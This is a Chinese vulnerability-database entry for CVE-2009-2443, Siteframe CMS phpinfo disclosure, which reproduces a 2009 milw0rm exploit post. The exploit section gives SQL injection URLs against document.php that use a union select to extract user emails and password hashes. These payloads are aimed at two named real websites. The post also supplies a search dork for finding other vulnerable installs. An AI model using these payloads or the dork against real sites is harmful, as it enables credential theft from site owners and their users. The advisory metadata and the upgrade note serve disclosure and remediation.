Siteframe 'phpinfo.php' 信息泄露漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1118071 漏洞类型 权限许可和访问控制
发布时间 2009-07-09 更新时间 2009-07-13
CVE编号 CVE-2009-2443 CNNVD-ID CNNVD-200907-183
漏洞平台 PHP CVSS评分 5.0
|漏洞来源
https://www.exploit-db.com/exploits/9098
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200907-183
|漏洞详情
Siteframe3.2.3和其它3.2.x版本会允许远程攻击者通过一个对phpinfo.php的直接请求(又称phpinfo功能)来获得配置信息。
|漏洞EXP
========================================================================================================================================================


  [o] Siteframe CMS 3.2.x SQL Injection & phpinfo() Disclosure Vulnerability

       Software : Siteframe CMS version 3.2.x
       Vendor   : http://siteframe.org/
       Download : http://sitefrane.org/downloads/
       Author   : NoGe
       Contact  : noge[dot]code[at]gmail[dot]com
       Blog     : http://evilc0de.blogspot.com


========================================================================================================================================================


  [o] Description

       Siteframe™ is a lightweight content-management system
       designed for the rapid deployment of community-based websites.
       With Siteframe, a group of users can share stories and photographs,
       create blogs, send email to one another, and participate in group activities.
       Siteframe enables this by providing web-based content management
       so that anyone can create content without needing to learn HTML.



  [o] Vulnerable file

       document.php



  [o] Exploit

       http://localhost/[path]/document.php?id=[SQL]
       http://localhost/[path]/phpinfo.php



  [o] Proof of concept

       http://digi-forum.com/frame/document.php?id=10+and+1=2+union+select+1,2,3,4,5,6,7,8,9,concat_ws(0x3a,user_email,user_passwd),11,12+from+users--
       http://digi-forum.com/frame/phpinfo.php
       http://myolympus.org/document.php?id=15570+and+1=2+union+select+1,2,3,4,5,6,7,8,9,concat_ws(0x3a,user_email,user_passwd),11,12+from+users--
       http://myolympus.org/phpinfo.php



  [o] Dork

       "Powered by Siteframe"



  [o] Notes

       Upgrade Siteframe CMS from 3.2.x to 5.0.6 (lastest)


========================================================================================================================================================


  [o] Greetz

       MainHack BrotherHood [ http://serverisdown.org/news ]
       Vrs-hCk OoN_BoY Paman bL4Ck_3n91n3 loqsa Angela Zhang
       H312Y yooogy mousekill }^-^{ kaka11 zxvf martfella
       skulmatic OLiBekaS ulga Cungkee k1tk4t str0ke


========================================================================================================================================================

# milw0rm.com [2009-07-09]
|参考资料

来源:XF
名称:siteframe-phpinfo-information-disclosure(51579)
链接:http://xforce.iss.net/xforce/xfdb/51579
来源:VUPEN
名称:ADV-2009-1822
链接:http://www.vupen.com/english/advisories/2009/1822
来源:BID
名称:35598
链接:http://www.securityfocus.com/bid/35598
来源:MISC
链接:http://www.packetstormsecurity.org/0907-exploits/siteframe-sqlphpinfo.txt
来源:SECUNIA
名称:35761
链接:http://secunia.com/advisories/35761
来源:OSVDB
名称:55683
链接:http://osvdb.org/55683